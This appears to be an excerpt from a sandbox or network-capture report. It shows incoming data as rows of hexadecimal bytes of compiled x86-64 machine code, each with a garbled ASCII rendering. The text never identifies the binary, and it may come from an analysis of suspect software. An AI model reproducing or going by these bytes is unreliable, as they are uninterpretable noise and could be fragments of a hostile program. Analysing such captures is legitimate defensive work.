8b 49 08 48 89 4d ff 45 85 ed 0f 85 84 fe ff ff 4c 8b 75 67 49 8b 46 18 4d 8b 76 10 48 8b 48 20 48 8b 59 28 8b 41 50 48 89 5d 7f 89 45 6f 4d 85 f6 0f 84 7d 01 00 Data Ascii: LEHUHMcH}mA$MtIAuE+I.H9utuLt@IAuD+HAHIcLuHA+~(A+xAF0;+HcIN(3LcA~0M~(AFPL}EoL}E3HMHIHMELugIFMvHH HY(APH]EoM}
2023-11-18 09:02:42 UTC	9219	IN	Data Raw: e1 05 48 63 7c 0d af 8d 5f 08 e8 87 fa 00 00 85 c0 0f 85 ac 01 00 00 85 db 0f 8e a4 01 00 00 48 63 db 48 8d 43 ff 48 3d fe fe ff 7f 0f 87 91 01 00 00 44 39 2d 1d 27 11 00 74 37 48 8b 0d d4 5c 11 00 48 85 c9 74 06 ff 15 89 27 11 00 48 8d 54 24 50 8b cb e8 9d 9b 0c 00 48 8b 0d b6 5c 11 00 48 85 c9 74 06 ff 15 7b 27 11 00 48 8b 5c 24 50 eb 10 8b cb ff 15 fc 26 11 00 48 8b d8 48 89 44 24 50 48 85 db 0f 84 38 01 00 00 8d 4f 01 4c 63 c1 8b 4e 50 ff c9 48 63 d1 48 8b cb 48 c1 e2 05 48 8b 54 15 a7 e8 ac e8 f7 ff 33 c9 45 33 ff 48 89 0c 1f 8b 4e 50 8d 41 ff 85 c0 7e 6a 48 8d 7d a7 0f 1f 44 00 00 83 7f f0 00 75 49 48 8b 07 41 2b cf 48 89 45 87 41 b9 01 00 00 00 48 8d 44 24 58 48 89 5c 24 58 48 89 44 24 28 45 33 c0 48 8d 45 87 48 89 5c 24 40 8d 51 ff 48 89 44 24 20 Data Ascii: Hc\|_HcHCH=D9-'t7H\Ht'HT$PH\Ht{'H\$P&HHD$PH8OLcNPHcHHHT3E3HNPA~jH}DuIHA+HEAHD$XH\$XHD$(E3HEH\$@QHD$
2023-11-18 09:02:42 UTC	9235	IN	Data Raw: ff ff 1f 00 c1 e0 15 49 83 c0 03 0b c1 0f ba e0 1c 72 0b 44 8b c8 41 b8 04 00 00 00 eb 39 44 8b c8 b9 1c 00 00 00 41 81 e1 ff ff ff 0f 66 0f 1f 84 00 00 00 00 00 41 0f b6 10 49 ff c0 8b c2 83 e0 7f 48 d3 e0 4c 03 c8 84 d2 79 08 83 c1 07 83 f9 3f 7e e2 44 2b c6 48 8b 7d 60 41 bf 01 00 00 00 8b 4d 48 48 8b c7 48 8b 55 50 49 2b c1 49 03 f9 4d 63 f0 4c 03 f6 85 c9 4c 89 75 b0 48 0f 45 f8 48 89 7d 60 48 89 7d c0 e9 2f fc ff ff 33 c0 49 89 45 00 48 8b 45 d8 eb 0e 48 8b 4d d8 e8 13 59 0c 00 33 c0 45 33 ed 48 8b 4d 70 44 2b e8 48 89 01 48 8b 45 78 44 89 28 8b 45 58 eb 05 b8 07 00 00 00 48 83 c4 78 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 8b d9 85 d2 74 13 41 83 39 00 74 0d 49 8b 00 4c 8b 54 24 Data Ascii: IrDA9DAfAIHLy?~D+H}`AMHHHUPI+IMcLLuHEH}`H}/3IEHEHMY3E3HMpD+HHExD(EXHxA_A^A]A\_^[]H\$HtA9tILT$
2023-11-18 09:02:42 UTC	9251	IN	Data Raw: 5d 30 7e 20 66 90 4c 8b ce 4c 8d 05 76 bd 0d 00 48 8d 54 24 40 49 8b ce e8 49 03 00 00 ff c3 3b 5d 30 7c e2 48 83 7d 58 00 48 8b 6c 24 50 48 8b 74 24 28 48 8b 5c 24 48 74 14 4c 8d 05 4d bd 0d 00 49 8b ce 48 8d 54 24 40 e8 18 03 00 00 4c 8b 74 24 20 48 85 ff 74 64 83 3d f7 a6 10 00 00 74 52 48 8b 0d ae dc 10 00 48 85 c9 74 06 ff 15 63 a7 10 00 48 8b cf ff 15 12 a7 10 00 48 ff 0d 5b dd 10 00 48 8b cf 48 63 d0 48 29 15 06 dd 10 00 ff 15 e8 a6 10 00 48 8b 0d 79 dc 10 00 48 85 c9 74 1a ff 15 3e a7 10 00 48 8b 44 24 40 48 83 c4 30 5f c3 48 8b cf ff 15 c2 a6 10 00 48 8b 44 24 40 48 83 c4 30 5f c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 40 55 57 41 54 48 83 ec 40 48 89 5c 24 68 4c 8d 25 23 4b 0d 00 33 db 48 89 74 24 70 49 8b e8 4c 89 74 24 38 48 8b f9 48 89 Data Ascii: ]0~ fLLvHT$@II;]0\|H}XHl$PHt$(H\$HtLMIHT$@Lt$ Htd=tRHHtcHH[HHcH)HyHt>HD$@H0_HHD$@H0_@UWATH@H\$hL%#K3Ht$pILt$8HH
2023-11-18 09:02:42 UTC	9267	IN	Data Raw: 0b 8b 41 54 23 41 50 48 83 c4 38 c3 b8 07 00 00 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 57 48 83 ec 20 48 8b d9 48 85 c9 75 12 48 8d 05 b7 74 0e 00 48 8b 5c 24 30 48 83 c4 20 5f c3 0f b6 41 6d 3c ba 74 32 3c 76 74 2e 3c 6d 74 2a 4c 8d 05 2d 0c 0d 00 b9 15 00 00 00 48 8d 15 e1 0b 0d 00 e8 14 a8 0b 00 48 8d 05 6d 7d 0e 00 48 8b 5c 24 30 48 83 c4 20 5f c3 48 8b 49 18 48 85 c9 74 06 ff 15 43 67 10 00 80 7b 63 00 74 0c 48 8d 3d 56 74 0e 00 e9 9a 00 00 00 48 8b 8b a8 01 00 00 48 85 c9 74 37 0f b7 51 08 41 b8 02 02 00 00 0f b7 c2 66 41 23 c0 66 41 3b c0 75 0c 80 79 0a 02 75 06 48 8b 79 10 eb 0f f6 c2 01 75 0f b2 02 e8 46 28 09 00 48 8b f8 48 85 ff 75 25 8b 4b 50 e8 56 1c 00 00 8b 53 50 4c 8b c0 48 8b cb e8 68 96 0b 00 48 Data Ascii: AT#APH8H8H\$WH HHuHtH\$0H _Am<t2<vt.<mt*L-HHm}H\$0H _HIHtCg{ctH=VtHHt7QAfA#fA;uyuHyuF(HHu%KPVSPLHhH
2023-11-18 09:02:42 UTC	9283	IN	Data Raw: 84 38 00 f9 16 00 46 74 15 0f b6 42 01 48 8d 52 01 41 ff c3 f6 84 38 00 f9 16 00 46 75 eb 41 8d 41 bd 83 f8 31 0f 87 df 02 00 00 48 98 0f b6 84 07 3c 3b 09 00 8b 94 87 2c 3b 09 00 48 03 d7 ff e2 41 83 fb 06 0f 85 bf 02 00 00 45 8b c3 4c 8d 15 6d 34 0d 00 4c 8b c9 41 0f b6 01 41 ff c8 84 c0 74 26 0f b6 d0 41 0f b6 02 0f b6 84 38 70 13 17 00 38 84 3a 70 13 17 00 75 0e 49 ff c1 49 ff c2 45 85 c0 7f d2 41 ff c8 45 85 c0 78 20 41 0f b6 02 0f b6 94 38 70 13 17 00 41 0f b6 01 0f b6 84 38 70 13 17 00 3b c2 0f 85 5c 02 00 00 41 8d 43 ff 41 b0 04 48 63 d0 48 03 ca e9 be fe ff ff 41 83 fb 07 75 78 45 8b c3 4c 8d 15 de 25 0d 00 4c 8b c9 0f 1f 00 41 0f b6 11 41 ff c8 84 d2 74 26 41 0f b6 02 0f b6 d2 0f b6 84 38 70 13 17 00 38 84 3a 70 13 17 00 75 0e 49 ff c1 49 ff c2 Data Ascii: 8FtBHRA8FuAA1H<;,;HAELm4LAAt&A8p8:puIIEAEx A8pA8p;\ACAHcHAuxEL%LAAt&A8p8:puII
2023-11-18 09:02:42 UTC	9299	IN	Data Raw: 48 8b 4d 7f 88 44 24 30 48 89 74 24 28 c7 44 24 20 55 00 00 00 e8 ec 68 00 00 48 89 43 d8 e9 1b fe ff ff 0f b6 43 08 4c 8b 4b c8 44 8b 43 c0 8b 53 90 48 8b 4d 7f 88 44 24 30 48 8b 43 f8 48 89 44 24 28 8b 43 f0 89 44 24 20 e8 b7 68 00 00 48 89 43 90 e9 e6 fd ff ff 0f 10 43 08 0f 11 43 08 e9 d9 fd ff ff 0f b7 43 ea 33 f6 89 45 df 48 89 75 e7 0f 10 45 df 0f 11 43 f0 e9 bf fd ff ff 0f b7 43 02 89 45 df 48 8b 43 f0 48 89 45 e7 0f 10 45 df 0f 11 43 f0 e9 a3 fd ff ff c6 43 20 00 e9 9a fd ff ff 0f b6 43 08 88 43 f0 e9 8e fd ff ff 0f b6 43 ea 88 43 f0 e9 82 fd ff ff 0f b6 43 02 88 43 08 e9 76 fd ff ff 48 8b 4b 08 48 85 c9 74 15 48 8b 43 f0 48 89 41 48 48 8b 43 08 48 89 43 f0 e9 58 fd ff ff 48 8b 53 f0 48 85 d2 74 0c 48 8b 4d 7f 48 8b 09 e8 9b b7 06 00 48 8b 43 08 Data Ascii: HMD$0Ht$(D$ UhHCCLKDCSHMD$0HCHD$(CD$ hHCCCC3EHuECCEHCHEECC CCCCCCvHKHtHCHAHHCHCXHSHtHMHHC
2023-11-18 09:02:42 UTC	9315	IN	Data Raw: 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 48 c7 04 c8 49 00 00 00 89 54 c8 08 44 89 54 c8 0c 4c 89 54 c8 10 48 63 8b 98 00 00 00 4d 39 6f 38 75 69 8b 55 7c 45 8b 40 58 ff c2 39 8b 9c 00 00 00 7f 16 44 8b ca 89 74 24 20 ba 5c 00 00 00 48 8b cb e8 cd 4d 08 00 eb 2d 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 5c 00 00 00 44 89 44 c8 04 89 54 c8 08 89 74 c8 0c 4c 89 54 c8 10 41 b8 02 00 00 00 8b d6 48 8b cf e8 ae 1a 00 00 45 33 d2 eb 53 39 8b 9c 00 00 00 7f 1d 44 8b ce 44 89 54 24 20 45 8b c3 ba 46 00 00 00 48 8b cb e8 69 4d 08 00 45 33 d2 eb 2e 8d 41 01 89 83 98 00 00 00 48 8d 0c 49 48 8b 83 90 00 00 00 c7 04 c8 46 00 00 00 44 89 5c c8 04 89 74 c8 08 44 89 54 c8 0c 4c 89 54 c8 10 48 63 8b 98 00 00 00 8b 55 68 39 8b 9c 00 00 Data Ascii: HIHHITDTLTHcM9o8uiU\|E@X9Dt$ \HM-AHIH\DDTtLTAHE3S9DDT$ EFHiME3.AHIHFD\tDTLTHcUh9
2023-11-18 09:02:42 UTC	9331	IN	Data Raw: 24 58 01 00 00 48 83 ce ff 4c 8d 25 ee 30 0c 00 66 0f 1f 44 00 00 48 ff c6 45 38 34 34 75 f7 48 8d 54 24 20 44 89 74 24 20 49 8b cc 81 e6 ff ff ff 3f e8 7f 88 0a 00 85 c0 75 04 44 8d 76 01 49 63 d6 49 8b cf 48 83 c2 48 e8 a8 d3 0a 00 48 8b f8 48 85 c0 74 7c 33 c0 48 89 07 48 89 47 08 48 89 47 10 48 89 47 18 48 89 47 20 48 89 47 28 48 89 47 30 48 89 47 38 48 89 47 40 48 83 c8 ff c6 07 9a 66 89 47 32 45 85 f6 75 21 8b 44 24 20 b9 00 00 00 20 85 c0 89 47 08 ba 00 00 00 10 0f 45 ca 81 c9 00 04 80 00 09 4f 04 eb 1f 48 8d 4f 48 48 89 4f 08 85 f6 74 0b 44 8b c6 49 8b d4 e8 93 28 f6 ff 48 8b 47 08 c6 04 06 00 c7 47 28 01 00 00 00 4c 8b a4 24 58 01 00 00 48 89 7b 28 4c 8b bc 24 00 01 00 00 4c 89 6b 50 48 8b 4d f0 48 33 cc e8 60 19 f6 ff 48 81 c4 08 01 00 00 41 5e Data Ascii: $XHL%0fDHE844uHT$ Dt$ I?uDvIcIHHHHt\|3HHGHGHGHG HG(HG0HG8HG@HfG2Eu!D$ GEOHOHHOtDI(HGG(L$XH{(L$LkPHMH3`HA^
2023-11-18 09:02:42 UTC	9347	IN	Data Raw: 03 00 00 00 66 41 89 45 30 41 8b c3 66 45 89 5d 2c 45 89 5d 28 89 44 24 60 4c 3b fd 0f 83 73 01 00 00 48 89 74 24 78 48 89 7c 24 20 66 66 0f 1f 84 00 00 00 00 00 41 81 44 24 38 e8 03 00 00 49 8b fb 41 88 45 10 49 8b d3 49 63 8e 5c 02 00 00 b8 01 00 00 00 85 c9 7e 22 45 8b 47 44 4c 8b c9 49 8d 8e 60 02 00 00 44 39 01 74 12 48 d1 c0 48 ff c2 48 83 c1 04 49 3b d1 7c ec 49 8b c3 49 89 45 08 49 8b f3 41 f6 47 3c 0a 49 8b 47 20 49 0f 45 f2 80 78 3f 01 75 71 4d 8d 4f 70 4c 3b cd 73 58 0f 1f 44 00 00 48 85 ff 75 07 41 f6 41 3c 0a 74 3e 49 63 8e 5c 02 00 00 b8 01 00 00 00 49 8b d3 85 c9 7e 25 45 8b 41 44 4c 8b d1 49 8d 8e 60 02 00 00 0f 1f 00 44 39 01 74 12 48 d1 c0 48 ff c2 48 83 c1 04 49 3b d2 7c ec 49 8b c3 48 0b f8 49 83 c1 70 4c 3b cd 72 ad 4c 8b c7 48 8b d6 Data Ascii: fAE0AfE],E](D$`L;sHt$xH\|$ ffAD$8IAEIIc\~"EGDLI`D9tHHHI;\|IIEIAG<IG IEx?uqMOpL;sXDHuAA<t>Ic\I~%EADLI`D9tHHHI;\|IHIpL;rLH
2023-11-18 09:02:42 UTC	9363	IN	Data Raw: 00 00 49 8b f1 4c 8b f9 48 8b 4a 20 4d 8b c8 44 8b d7 85 c0 7e 39 44 8b 46 44 48 83 c1 28 8b d0 66 0f 1f 44 00 00 44 39 41 f4 75 19 4c 85 09 75 14 0f b7 41 ec a9 ff f7 ff ff 74 09 f6 41 ea 80 75 03 41 ff c2 48 83 c1 38 48 83 ea 01 75 d7 48 8b 84 24 a0 00 00 00 8b ef 89 7c 24 20 48 85 c0 74 43 48 63 18 44 8b cf 85 db 7e 2f 4c 8b c7 48 8d 48 18 0f 1f 00 48 8b 51 f0 80 3a a6 75 1c 8b 46 44 39 42 2c 75 14 f6 01 02 75 0f 41 ff c1 49 ff c0 48 83 c1 20 4c 3b c3 7c db 44 3b cb 0f 44 eb 89 6c 24 20 49 8b 0f 49 63 f2 4c 63 ed 48 8d 5e 07 48 8d 1c 9e 4e 8d 34 ed 00 00 00 00 49 8d 1c 9e 48 85 c9 74 0d 48 8b d3 e8 27 53 0a 00 4c 8b e0 eb 5b 48 8d 43 ff 48 3d fe fe ff 7f 77 4c 39 3d 70 e6 0e 00 74 37 48 8b 0d 27 1c 0f 00 48 85 c9 74 06 ff 15 dc e6 0e 00 48 8d 54 24 28 Data Ascii: ILHJ MD~9DFDH(fDD9AuLuAtAuAH8HuH$\|$ HtCHcD~/LHHHQ:uFD9B,uuAIH L;\|D;Dl$ IIcLcH^HN4IHtH'SL[HCH=wL9=pt7H'HtHT$(
2023-11-18 09:02:42 UTC	9379	IN	Data Raw: e8 51 f3 04 00 85 c0 0f 85 ab 00 00 00 4c 8b 06 41 83 c9 ff 48 8b 17 33 c9 4d 8b 40 18 48 8b 52 18 e8 30 f3 04 00 85 c0 0f 85 8a 00 00 00 0f b7 cb 8d 41 ff 85 c1 74 13 0f b6 c3 b9 08 00 00 00 a8 18 bb 20 00 00 00 66 0f 45 d9 49 8b 06 48 8b 17 48 8b 08 48 85 d2 74 5f 48 8b 09 45 33 c9 45 33 c0 e8 3f 73 05 00 4c 8b c8 48 85 c0 74 49 44 0f b7 c3 ba 35 00 00 00 41 83 f8 02 74 18 33 c9 66 0f 1f 44 00 00 ff c1 b8 02 00 00 00 d3 e0 ff c2 44 3b c0 75 f0 41 88 11 41 b8 03 00 00 00 49 8b d1 49 8b ce e8 5c 08 00 00 44 8b c0 49 8b d6 48 8b cd e8 3e e2 ff ff 48 8b 5c 24 30 48 8b 6c 24 38 48 8b 74 24 40 48 8b 7c 24 48 48 83 c4 20 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc b8 00 04 00 00 66 39 41 14 74 09 33 c0 85 d2 48 0f 44 c1 c3 4c 8b 41 20 41 Data Ascii: QLAH3M@HR0At fEIHHHt_HE3E3?sLHtID5At3fDD;uAAII\DIH>H\$0Hl$8Ht$@H\|$HH A^f9At3HDLA A
2023-11-18 09:02:42 UTC	9395	IN	Data Raw: 41 8d 50 49 e8 1d 0e 07 00 eb 2a 8d 41 01 89 87 98 00 00 00 48 8d 0c 49 48 8b 87 90 00 00 00 48 c7 04 c8 49 00 00 00 44 89 64 c8 08 89 54 c8 0c 4c 89 4c c8 10 83 bc 24 a0 00 00 00 00 ba 26 00 00 00 b8 22 00 00 00 44 8b c6 0f 45 d0 48 8b cf e8 71 0c 07 00 48 63 9f 98 00 00 00 45 33 c0 39 9f 9c 00 00 00 7f 18 45 33 c9 44 89 44 24 20 41 8d 50 0b 48 8b cf e8 ab 0d 07 00 8b d8 eb 26 48 8d 0c 5b 8d 43 01 89 87 98 00 00 00 48 8b 87 90 00 00 00 48 c7 04 c8 0b 00 00 00 4c 89 44 c8 08 4c 89 44 c8 10 83 bc 24 a0 00 00 00 00 ba 1a 00 00 00 b8 17 00 00 00 89 6c 24 28 0f 45 d0 44 89 64 24 20 45 33 c9 44 8b c6 48 8b cf e8 a5 01 07 00 4c 8b 84 24 98 00 00 00 41 89 40 14 8b 97 98 00 00 00 85 db 79 03 8d 5a ff 48 8b 07 80 78 63 00 74 09 48 8d 05 94 9d 0e 00 eb 12 48 63 c3 Data Ascii: API*AHIHHIDdTLL$&"DEHqHcE39E3DD$ APH&H[CHHLDLD$l$(EDd$ E3DHL$A@yZHxctHHc
2023-11-18 09:02:42 UTC	9411	IN	Data Raw: 76 74 1a 3c ba 74 0d 3c 6d 74 09 4c 8d 05 7c cc 0a 00 eb a2 4c 8d 05 63 cc 0a 00 eb 99 48 85 d2 74 a5 48 c7 44 24 20 00 00 00 00 e8 16 00 00 00 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 48 89 7c 24 20 41 56 48 83 ec 30 48 8b f9 49 8b e9 48 8b 49 18 49 8b d8 4c 8b f2 48 85 c9 74 06 ff 15 5b 27 0e 00 48 8b 74 24 60 4c 8b cd 4c 8b c3 48 89 74 24 20 49 8b d6 48 8b cf e8 60 00 00 00 80 7f 63 00 75 04 33 db eb 1a 33 d2 48 8b cf e8 ac 8d 09 00 8b d8 85 c0 74 0a 48 85 f6 74 05 48 8b cd ff d6 48 8b 4f 18 48 85 c9 74 06 ff 15 1d 27 0e 00 48 8b 6c 24 48 8b c3 48 8b 5c 24 40 48 8b 74 24 50 48 8b 7c 24 58 48 83 c4 30 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 5c 24 08 48 89 6c 24 Data Ascii: vt<t<mtL\|LcHtHD$ H8H\$Hl$Ht$H\|$ AVH0HIHIILHt['Ht$`LLHt$ IH`cu33HtHtHHOHt'Hl$HH\$@Ht$PH\|$XH0A^H\$Hl$
2023-11-18 09:02:42 UTC	9427	IN	Data Raw: 8d 0c 49 49 8b 86 90 00 00 00 89 74 c8 04 8b 75 98 89 74 c8 0c c7 04 c8 5c 00 00 00 89 54 c8 08 4c 89 54 c8 10 33 ff 49 63 8e 98 00 00 00 41 39 8e 9c 00 00 00 7f 18 45 33 c9 89 7c 24 20 44 8b c6 49 8b ce 41 8d 51 0f e8 d9 8d 06 00 eb 32 8d 41 01 41 89 86 98 00 00 00 48 8d 0c 49 49 8b 86 90 00 00 00 c7 04 c8 0f 00 00 00 89 74 c8 04 48 c7 44 c8 08 00 00 00 00 48 89 7c c8 10 eb 02 33 ff 80 7d 80 00 0f 85 e8 00 00 00 83 7d 00 00 0f 85 e8 00 00 00 48 83 7d 18 00 0f 84 10 02 00 00 8b f7 8b 85 70 01 00 00 45 33 c9 4c 8b 85 60 01 00 00 48 8b cb 48 8b 55 18 89 44 24 30 48 8b 45 a0 48 89 44 24 28 c7 44 24 20 03 00 00 00 e8 a3 16 00 00 4c 8b 45 a0 0b f0 8b df 66 41 3b 78 36 0f 8d 5a 01 00 00 44 8b 6c 24 74 45 33 ff 44 8b 65 38 0f 1f 40 00 41 f6 40 30 20 4d 8b 58 08 Data Ascii: IItut\TLT3IcA9E3\|$ DIAQ2AAHIItHDH\|3}}H}pE3L`HHUD$0HEHD$(D$ LEfA;x6ZDl$tE3De8@A@0 MX
2023-11-18 09:02:42 UTC	9443	IN	Data Raw: ca 84 c0 74 1c 0f b6 c8 41 0f b6 01 0f b6 04 28 38 04 29 75 0c 49 ff c0 49 ff c1 85 d2 7f dc ff ca 85 d2 78 14 41 0f b6 01 0f b6 14 28 41 0f b6 00 0f b6 0c 28 3b ca 75 14 48 8d 15 c6 a6 0a 00 48 8b cf e8 ce d5 08 00 e9 db fe ff ff 41 0f b6 45 3f 8b 8c 24 f8 00 00 00 3c 02 75 37 83 f9 41 74 2e 83 f9 21 48 8d 05 c2 a6 0a 00 4c 8d 05 c3 a6 0a 00 48 8b cf 4c 0f 44 c0 4d 8d 4c 24 08 48 8d 15 b8 a6 0a 00 e8 8b d5 08 00 e9 88 fe ff ff 3c 02 74 1e 83 f9 41 75 19 4d 8d 44 24 08 48 8b cf 48 8d 15 be a6 0a 00 e8 69 d5 08 00 e9 66 fe ff ff 80 bf 14 01 00 00 02 0f 83 90 00 00 00 49 8b 55 60 48 8b cb e8 0b 04 01 00 8b 94 24 20 01 00 00 48 63 e8 48 8b 43 20 48 8b cd 48 c1 e1 05 4c 8b 3c 01 85 d2 74 06 48 8b 48 20 eb 03 49 8b cf 83 fd 01 74 04 85 d2 74 06 41 ba 05 00 00 Data Ascii: tA(8)uIIxA(A(;uHHAE?$<u7At.!HLHLDML$H<tAuMD$HHifIU`H$ HcHC HHL<tHH IttA
2023-11-18 09:02:42 UTC	9459	IN	Data Raw: 00 44 89 74 c8 04 4c 89 7c c8 08 4c 89 7c c8 10 48 8b 0f 44 38 79 63 74 14 4c 8b c5 ba fe ff ff ff e8 a0 f8 05 00 48 8b 74 24 40 eb 59 85 d2 79 08 8b 97 98 00 00 00 ff ca 48 63 c2 48 8d 0c 40 48 8b 87 90 00 00 00 44 38 7c c8 01 48 8d 14 c8 74 18 41 b9 fe ff ff ff 4c 8b c5 48 8b cf e8 43 f5 05 00 48 8b 74 24 40 eb 1c 48 8b 74 24 40 48 85 ed 74 12 48 89 6a 10 c6 42 01 fe eb 08 44 8b b4 24 a0 00 00 00 48 63 8f 98 00 00 00 8b 56 10 39 8f 9c 00 00 00 7f 19 89 54 24 20 45 8b cd ba a0 00 00 00 45 33 c0 48 8b cf e8 77 0d 06 00 eb 2a 8d 41 01 89 87 98 00 00 00 48 8d 0c 49 48 8b 87 90 00 00 00 48 c7 04 c8 a0 00 00 00 44 89 6c c8 08 89 54 c8 0c 4c 89 7c c8 10 48 8b 0f 48 8b 56 08 44 38 79 63 74 0f 4c 8b c2 ba f8 ff ff ff e8 d1 f7 05 00 eb 1f 8b 87 98 00 00 00 ff c8 Data Ascii: DtL\|L\|HD8yctLHt$@YyHcH@HD8\|HtALHCHt$@Ht$@HtHjBD$HcV9T$ EE3Hw*AHIHHDlTL\|HHVD8yctL
2023-11-18 09:02:42 UTC	9475	IN	Data Raw: 8b cc e8 4f 29 00 00 48 89 44 24 78 eb 0f b8 07 00 00 00 e9 a5 11 00 00 48 89 6c 24 78 49 89 5f 48 45 33 c0 49 8b 0c 24 48 8b d3 e8 76 ee 03 00 49 89 46 48 81 ff 86 00 00 00 75 08 44 8b ed e9 3f 01 00 00 49 8b 47 20 48 8b 8c 24 30 01 00 00 44 8b 20 8b 41 38 44 8d 68 01 ff c0 41 03 c4 44 89 6c 24 50 89 41 38 48 63 8e 98 00 00 00 39 8e 9c 00 00 00 7f 18 45 33 c0 89 6c 24 20 45 8b cd 48 8b ce 41 8d 50 46 e8 9a cd 05 00 eb 2a 8d 41 01 89 86 98 00 00 00 48 8d 0c 49 48 8b 86 90 00 00 00 48 c7 04 c8 46 00 00 00 44 89 6c c8 08 89 6c c8 0c 48 89 6c c8 10 48 8b 5c 24 58 41 b8 01 00 00 00 48 8b cb 41 8b d4 e8 a8 4f 00 00 48 89 84 24 80 00 00 00 48 85 c0 0f 84 28 01 00 00 8b dd 45 85 e4 0f 8e 91 00 00 00 48 8b b4 24 38 01 00 00 4c 8d 78 20 4c 8b f5 48 8b fd 4c 8b e8 Data Ascii: O)HD$xHl$xI_HE3I$HvIFHuD?IG H$0D A8DhADl$PA8Hc9E3l$ EHAPF*AHIHHFDllHlH\$XAHAOH$H(EH$8Lx LHL
2023-11-18 09:02:42 UTC	9491	IN	Data Raw: 48 98 48 8d 77 01 48 3b f8 7e 1d 48 85 c9 74 64 48 8b 81 60 01 00 00 48 85 c0 74 58 ff 40 30 c7 40 18 12 00 00 00 eb 4c ba 20 00 00 00 48 3b f2 0f 4f d6 39 53 20 7d 11 45 33 c0 48 8b cb e8 d3 bc 05 00 85 c0 75 2d eb 0d 48 8b 43 18 66 83 63 08 2d 48 89 43 10 48 8b 4b 10 4c 8b c6 49 8b d4 e8 f1 a8 f3 ff 0f ba f7 1f 66 89 6b 08 89 7b 0c c6 43 0a 01 48 8b 84 24 d0 00 00 00 bf 01 00 00 00 41 ff c7 49 83 c5 20 be 00 24 00 00 8d 4f ff 44 3b 38 0f 8c 8d fb ff ff 4c 8b 6c 24 78 4c 8b a4 24 80 00 00 00 48 8b bc 24 88 00 00 00 48 8b b4 24 90 00 00 00 48 8b ac 24 98 00 00 00 48 8b 9c 24 a0 00 00 00 48 81 c4 a8 00 00 00 41 5f 41 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 8b c4 4c 89 48 20 4c 89 40 18 48 89 50 10 55 53 48 8d 68 a9 48 81 ec 98 Data Ascii: HHwH;~HtdH`HtX@0@L H;O9S }E3Hu-HCfc-HCHKLIfk{CH$AI $OD;8Ll$xL$H$H$H$H$HA_A^HLH L@HPUSHhH
2023-11-18 09:02:42 UTC	9507	IN	Data Raw: e8 e1 83 fc ff 4c 8b 64 24 20 4d 85 f6 74 07 48 8b 45 78 49 89 06 80 bb c5 00 00 00 00 75 1a 44 8b 45 78 49 8b d7 44 0f b6 4c 24 28 45 2b c7 48 8b 4c 24 50 e8 0d 52 05 00 80 7b 63 00 74 10 be 07 00 00 00 c6 44 24 5d 00 89 74 24 58 eb 2a 8b 74 24 58 85 f6 0f 84 90 00 00 00 83 fe 65 0f 84 87 00 00 00 80 7c 24 5d 00 74 0e 48 8d 4c 24 40 e8 a1 04 00 00 8b 74 24 58 48 8b 7c 24 50 48 85 ff 74 25 8b 47 24 3d a3 0d f2 2d 74 07 3d 73 29 9c 31 75 08 48 8b cf e8 4a 09 05 00 48 8b cf e8 b2 02 05 00 8b 74 24 58 4d 85 e4 74 21 4d 8b cc 4c 8d 05 a7 5b 09 00 8b d6 48 8b cb e8 a5 d6 07 00 49 8b d4 48 8b cb e8 aa 17 08 00 eb 5b 89 73 50 85 f6 75 0a 48 83 bb a8 01 00 00 00 74 4a 8b d6 48 8b cb e8 0d d8 07 00 eb 3e 48 8b 44 24 50 48 8b 4c 24 38 48 89 01 33 c0 8b f0 89 43 50 Data Ascii: Ld$ MtHExIuDExIDL$(E+HL$PR{ctD$]t$X*t$Xe\|$]tHL$@t$XH\|$PHt%G$=-t=s)1uHJHt$XMt!ML[HIH[sPuHtJH>HD$PHL$8H3CP
2023-11-18 09:02:42 UTC	9523	IN	Data Raw: 44 24 28 89 74 24 20 e8 ca 17 01 00 44 8b 45 f0 8d 56 54 45 03 c7 89 45 b4 44 8d 4e 01 4c 89 75 a8 48 8b cb e8 2d 0c 05 00 41 0f b7 4e 60 8d 56 1f 8b 45 b4 44 8b cf 89 4c 24 28 45 8b c7 48 8b cb 89 44 24 20 e8 2c 02 05 00 4c 8d 05 25 5d 09 00 48 8b cb 8d 56 03 8b f8 e8 a8 0a 05 00 8d 56 6f c7 44 24 20 03 00 00 00 44 8d 4e 03 48 8b cb 44 8d 46 07 e8 2d 0d 05 00 4c 8d 05 fe 5c 09 00 48 8b cb 8d 56 04 e8 7b 0a 05 00 8d 56 6f c7 44 24 20 03 00 00 00 44 8d 4e 03 48 8b cb 44 8d 46 04 e8 00 0d 05 00 4d 8b 06 8d 56 04 48 8b cb e8 52 0a 05 00 8d 56 6f 89 45 c0 44 8d 4e 03 c7 44 24 20 03 00 00 00 44 8d 46 04 48 8b cb e8 d4 0c 05 00 48 8b cb e8 fc 0e 00 00 8b d7 89 45 c8 48 8b cb e8 8f fb 04 00 41 38 76 62 0f 84 1f 01 00 00 41 ff 4c 24 44 8b fe 45 8b 7c 24 44 66 41 Data Ascii: D$(t$ DEVTEEDNLuH-AN`VEDL$(EHD$ ,L%]HVVoD$ DNHDF-L\HV{VoD$ DNHDFMVHRVoEDND$ DFHHEHA8vbAL$DE\|$DfA
